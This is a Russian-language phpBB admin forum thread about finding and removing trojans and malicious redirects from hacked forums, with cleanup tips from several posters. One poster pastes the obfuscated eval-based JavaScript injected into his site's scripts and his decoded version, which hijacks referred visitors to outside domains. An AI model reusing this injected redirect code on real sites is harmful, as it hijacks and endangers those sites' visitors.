Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[Юрий5]

Всем привет. Появилась проблема схожая с другими.
В общем делал следующие правки по темах:
http://www.phpbb-work.ru/vistraivaem-ka ... d-t14.html и Images across in attachment
Суть выстроить картинки в ряд, правки были файлов были: attachment.html, stylesheet.css, ббкоде.html
Желаемого результата не добился, залил назад файлы старые +обновил шаблоны. И тут началось интересное..

Сбоку появился белый фон, вместо привычных голубых синих "полосок"

Потом в коде обнаружил этот код, думал Гугл что то чудит, но временно убрав гугл приблуды с кода (Гугл+, аналитикс) желаемого результата не дали.
В ручную просмотрел файлы index.php и index_body.html, но ничего там подозрительного не нашел.
Где рыть? База? Хостер?

Код: Выделить всё

<iframe name="oauth2relay826583877" id="oauth2relay826583877" src="https://accounts.google.com/o/oauth2/postmessageRelay?parent=http%3A%2F%2Falpinisty.net#rpctoken=535250538&forcesecure=1" tabindex="-1" style="width: 1px; height: 1px; position: absolute; top: -100px;"></iframe> <div class="highslide-container" style="padding: 0px; border: none; margin: 0px; position: absolute; left: 0px; top: 0px; width: 100%; z-index: 1001; direction: ltr;"><a class="highslide-loading" title="Нажать для выхода" href="javascript:;" style="position: absolute; top: -9999px; opacity: 0.75; z-index: 1;">Загрузка...</a><div style="display: none;"></div><div class="highslide-viewport highslide-viewport-size" style="padding: 0px; border: none

[Юрий5]

P.s. Перезалил файлы через фтп, результата не добился никакого.

[San4]

del. it

[hsabarab]

Всем привет. Начиналось всё отлично! Взял в аренду сервер, поставил систему и давай продвигать свой форум. И попался вот такой сайт

Скрытый текст

autoprogon.com

Бесплатный прогон сайта по каталогам! Я следовал инструкции! После прогона, как и следовало ожидать, позиция сайта не изменилась. И буквально через месяц я случайно заметил что при переходе по внешним ссылкам на мой форум сразу перекидывает на другую страницу. И адрес этой страницы постоянно меняется.

Скрытый текст

clikunder.ru

Установил чистый форум, поменял пароли! Помогло! И вот недавно опять вылезла эта дрянь!
Я давай копать глубже! Скачиваю копию форума на комп и давай рыть. Сканировал антивирем чисто. Давай смотреть по дате последнего изменения и вот ЕВРИКА! Нашел! Были заражены все скрипты вот пример одного из кодов

код 

(function () {
var a = "(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/br1}0)(;",
b = "fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/0uB,0})",
c = "utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:q./'20})",
d = "";
for (var i = 0; i < a.length; i++)
d += a.charAt(i) + b.charAt(i) + c.charAt(i);
eval(d);
}
());
(function () {
var a = "(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",
b = "fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",
c = "utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",
d = "";
for (var i = 0; i < a.length; i++)
d += a.charAt(i) + b.charAt(i) + c.charAt(i);
evaleval(decrypt(encrypted)); ;
}
());

После расшифровки получил такую картину

Код 2 

(function () {
function c(x) {
if (x.substr(0, 8) == 'https://')
x = x.substr(8);
if (x.substr(0, 7) == 'http://')
x = x.substr(7);
if (x.substr(0, 4) == 'www.')
x = x.substr(4);
if (x.indexOf('/') != -1)
x = x.split('/')[0];
if (x.indexOf('?') != -1)
x = x.split('?')[0];
return x
}
var host = c(window.location.hostname),
ref = c(document.referrer),
co = document.cookie,
ident = '_y_m_=off',
D = new Date();
D.setDate(D.getDate() + 20);
document.cookie = ident + ';path=/;expires=' + D;
if (ref != '' && ref != host && co.indexOf(ident) == -1) {
setInterval(function () {
window.location.href = 'http://qb0.ru/1B'
}, 2000)
}
}
());
(function () {
function c(x) {
if (x.substr(0, 8) == 'https://')
x = x.substr(8);
if (x.substr(0, 7) == 'http://')
x = x.substr(7);
if (x.substr(0, 4) == 'www.')
x = x.substr(4);
if (x.indexOf('/') != -1)
x = x.split('/')[0];
if (x.indexOf('?') != -1)
x = x.split('?')[0];
return x
}
var host = c(window.location.hostname),
ref = c(document.referrer),
co = document.cookie,
ident = '_y_m_=off',
D = new Date();
D.setDate(D.getDate() + 20);
document.cookie = ident + ';path=/;expires=' + D;
if (ref != '' && ref != host && co.indexOf(ident) == -1) {
setInterval(function () {
window.location.href = 'http://02o.org/1a'
}, 2000)
}
}
());

Удалил вредоносный код во всех файлах и заработало но не на долго.
Следующий его ход(хакера) был сделан в сторону мода Advanced BBCode Box. Удалил мод и почистил базу с помощью STK.
Дальнейшие мои были действия это установил права на файлы и папки(запретил запись), отключил галерею и загрузку аватар из админки а на папки поставил права только чтение(было предположение что оттуда запускался шел), поменял снова пароли на все(форум, БД, админка на сервере, ФТП ), на файл config.php выставил права 400.
Пока всё чисто! тьфу.. тьфу..

Какие еще варианты или способы есть обезопасить себя от хакеров? И как его наказать или вычислить?

[apollion]

Запретите сохранение паролей в программе, через которую вы заходите на FTP.

Отправлено спустя 1 минуту 30 секунд:

Бесплатный прогон сайта по каталогам!

А вот этого не нужно было делать. От этого только минус.

[hsabarab]

Спасибо. Уже сделал.

[Gubkin]

что за фигня, переодически всплывает окно такое в касперском фри
как оказалось IP это мой форум ))

[ronim]

Gubkinмой антивирус ( g-data) ни как не реагирует на твой форум.
Хотя по по проверке сайтов весьма вредный

[Gubkin]

проверил свой комп на вирусы, dr.web cureit нашел модифицированный hosts
восстановил
пока таких сообщений не вижу )

[apollion]

hosts тут врядли виноват. У меня тоже модифицирован, но не трояном, а лично мной. Что это у вас там за src.js?

Отправлено спустя 2 минуты 24 секунды:
Яндекс с Гуглем не нашли на вашем форуме вирусов при последней проверке. Яндекс лишь написал, что у вас клей с www.

[Gubkin]

Что это у вас там за src.js?

нет такого файла на форуме
не понимаю что там браузер пытается открыть

[apollion]

Ну, для самоуспокоения вы можете:
- проверить файлы форума на вирусы онлайн - была ссылка на сервис, но я не найду
- проверить Айболитом

Кстати, если у вас выделенный айпишник форума - добавление записи в hosts ускорит загрузку форума в браузере. Но это необязательно.

[Pazh]

phpMussel - никто не пробовал что за зверь и есть ли успехи по сравнению например с ai-bolit?

[Zemius]

Версия phpbb 3.1.12. Стала возникать реклама на весь экран! Через где то 20 переходов на страницы форума. Похоже что зацепился какой то вирус или троян. Проверка на вирусы ничего не дало. Беглый просмотр времени изменения файлов на сервере не показал наличия изменений. Подскажите что ещё можно сделать?

Отправлено спустя 11 минут 53 секунды:
Реклама вылетает при любом переходе по ссылке на форуме (при серфинге по форуму).
Да ещё.. При этом при переходи со страницы на страницу стал моргать экран со сменой кодировки. Происходит это быстро и не сразу на это обращаешь внимание. Я записал видео и вырезал нужный кадр. Выглядит это примерно так:

смена кодировки.jpg

[Pazh]

Zemius, это не вирус, а кривой css, который возвращает сервер или закешировался в браузере (более вероятно, т.к. для гостя показывает все нормально)